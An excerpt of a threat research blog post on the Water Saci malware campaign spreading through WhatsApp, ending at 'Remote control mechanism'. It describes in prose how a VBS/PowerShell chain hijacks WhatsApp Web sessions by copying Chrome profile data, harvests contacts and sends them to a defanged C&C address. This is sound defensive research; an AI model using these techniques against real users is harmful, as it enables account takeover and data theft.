rss-bridge 2025-10-27T00:00:00+00:00

Active Water Saci Campaign Spreading Via WhatsApp Features Multi-Vector Persistence and Sophisticated C&C

Continuous investigation on the Water Saci campaign reveals innovative email-based C&C system, multi-vector persistence, and real-time command capabilities that allow attackers to orchestrate coordinated botnet operations, gather detailed campaign intelligence, and dynamically control malware activity across multiple infected machines.

Malware

Active Water Saci Campaign Spreading Via WhatsApp Features Multi-Vector Persistence and Sophisticated C&C

By: Jeffrey Francis Bonaobra, Joe Soares, Emmanuel Panopio

Oct 27, 2025

Read time: ( words)

Save to Folio

*With contributions from Paul John Bardon, Ieriz Nicolle Gonzalez, Joshua Paul Ignacio, Ian Kenefick, Victor Bertho, Valentim Uliana, Guilherme Marcelino de Sa, Laercio Maciel, Matheus Perestrelo, Felippe Barros, Pedro Alberto Costa, Gustavo Silva*

Key takeaways:

Further investigation into the active Water Saci campaign shows a new attack chain that utilizes an email-based C&C infrastructure, employs multi-vector persistence for resilience, and incorporates advanced checks to evade analysis and restrict activity to specific targets.**

The new attack chain also features a sophisticated remote command-and-control system that allows threat actors real-time management, including pausing, resuming, and monitoring the malware’s campaign, effectively converting infected machines into a botnet tool for coordinated, dynamic operations across multiple endpoints.

Trend Vision One™ detects and blocks the IoCs discussed in this blog. Trend Micro customers can also access tailored hunting queries, threat insights, and intelligence reports to better understand and proactively defend against this campaign. In addition, Trend customers are protected from the Water Saci campaign via the specific rules and filters listed at the end of this blog entry.

Trend™ Research is continuously tracking the aggressive malware campaign it identified as Water Saci, which uses WhatsApp as its primary infection vector. In our previous blog, the Water Saci campaign, with its malware identified as SORVEPOTEL, automatically distributes the same malicious ZIP file to all contacts and groups associated with the victim’s compromised account for rapid propagation.

More recent activity points to the emergence of a new infection chain that diverges from previously discussed .NET-based methods. On October 8, 2025, Trend Research analysis revealed file downloads originating from WhatsApp web sessions. Closer examination shows that instead of employing .NET binaries, the new chain leverages script-based techniques, orchestrating payload delivery through a combination of Visual Basic Script (VBS) downloaders and PowerShell (PS1) scripts. The following sections provide a detailed technical analysis of this evolving infection mechanism.

Technical analysis

[Figure 1. New Water Saci attack chain observed]

Figure 1. New Water Saci attack chain observed

download

Trend Research analysis revealed suspicious file downloads initiated through WhatsApp Web, specifically files named Orcamento-2025.zip*.

[Figure 2. Downloaded Orcamento-2025.zip files as seen in Vision One]*

Figure 2. Downloaded Orcamento-2025.zip files as seen in Vision One*

The infection chain is initiated when a user downloads and extracts the ZIP archive, which includes an obfuscated VBS downloader named Orcamento.vbs. This VBS downloader issues a PowerShell command that carries out fileless execution via New-Object Net.WebClient to download and execute a PowerShell script named tadeu.ps1 directly in memory.

[Figure 3. Deobfuscated Orcamento.vbs]

Figure 3. Deobfuscated Orcamento.vbs

The downloaded PowerShell script is used to hijack WhatsApp Web sessions, harvest all contacts from the victim's account, and automatically distribute malicious ZIP files to the said contacts while maintaining persistent command and control communication for large-scale social engineering campaigns.

tadeu.ps1 a.k.a. whatsapp_automation_v6_robust.ps1

The malware begins its sophisticated attack by displaying a deceptive banner claiming to be "WhatsApp Automation v6.0", immediately masking its malicious intent behind the guise of legitimate software. Investigation shows the consistent use of Portuguese, which suggest the threat actor’s focus on Brazil.

[Figure 4. Deceptive banner displayed by tadeu.ps1]

Figure 4. Deceptive banner displayed by tadeu.ps1

Upon initialization, it generates a unique session identifier and establishes contact with its command-and-control (C&C) infrastructure at hxxps://miportuarios[.]com/sisti/config[.]php to download operational parameters including target lists, message templates, and timing configurations.

[Figure 5. Function used to download config from C&C server]

Figure 5. Function used to download config from C&C server

If the C&C server is unreachable, the malware seamlessly falls back to hardcoded default settings, ensuring the attack proceeds regardless of network conditions.

[Figure 6. Hardcoded backup configuration]

Figure 6. Hardcoded backup configuration

download

It creates a temporary workspace in C:\temp, downloads the latest WhatsApp automation library (WA-JS) from GitHub, and retrieves a malicious ZIP payload and saves it as Bin.zip in C:\temp.

[Figure 7. Downloading the WhatsApp automation library and the ZIP payload]

Figure 7. Downloading the WhatsApp automation library and the ZIP payload

download

WhatsApp web browser hijacking

Similar to how the previous attack chain hijacks WhatsApp Web browser sessions, the malware checks the installed Chrome version and downloads the appropriate ChromeDriver for browser automation. It then installs the Selenium PowerShell module, enabling automated browser tasks on the victim’s machine.

[Figure 8. Checking of installed Chrome version and downloading of ChromeDriver]

Figure 8. Checking of installed Chrome version and downloading of ChromeDriver

[Figure 9. Installing Selenium PowerShell module]

Figure 9. Installing Selenium PowerShell module

After terminating any existing Chrome processes and clearing old sessions to ensure clean operation, the malware copies the victim's legitimate Chrome profile data to its temporary workspace. This data includes cookies, authentication tokens, and the saved browser session. This technique allows the malware to bypass WhatsApp Web's authentication entirely, gaining immediate access to the victim's WhatsApp account without triggering security alerts or requiring QR code scanning.

[Figure 10. Terminating Chrome processes and sessions]

Figure 10. Terminating Chrome processes and sessions

[Figure 11. Copying of the victim's legitimate Chrome profile data]

Figure 11. Copying of the victim's legitimate Chrome profile data

download

With the hijacked session in place, the malware launches Chrome with specific automation flags designed to evade detection and inject the WA-JS library for WhatsApp control.

[Figure 12. Configuring Chrome with specific automation flags for defense evasion]

Figure 12. Configuring Chrome with specific automation flags for defense evasion

[Figure 13. WA-JS library injection]

Figure 13. WA-JS library injection

The malware then systematically harvests all WhatsApp contacts using sophisticated JavaScript filtering to exclude specific number patterns while collecting names and phone numbers. The harvested contact list is immediately exfiltrated to the C&C server.

[Figure 14. WhatsApp contact harvesting and filtering]

Figure 14. WhatsApp contact harvesting and filtering

download

[Figure 15. Sending of contact list to C&C server]

Figure 15. Sending of contact list to C&C server

download

Remote control mechanism

[...]

Original source